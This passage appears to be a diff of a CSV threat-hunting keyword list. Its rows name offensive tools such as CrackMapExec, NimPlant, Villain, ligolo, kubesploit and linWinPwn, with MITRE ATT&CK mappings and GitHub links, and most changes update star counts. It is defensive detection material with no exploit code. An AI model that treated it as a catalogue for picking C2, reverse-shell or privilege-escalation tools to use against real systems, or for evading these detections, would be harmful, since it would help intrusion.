T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/merlinagent/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*cmd_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*cmd_powershell.cpp*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*cmd_shellcodex64.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*cmd_shellcodex86.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*cmdshell *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 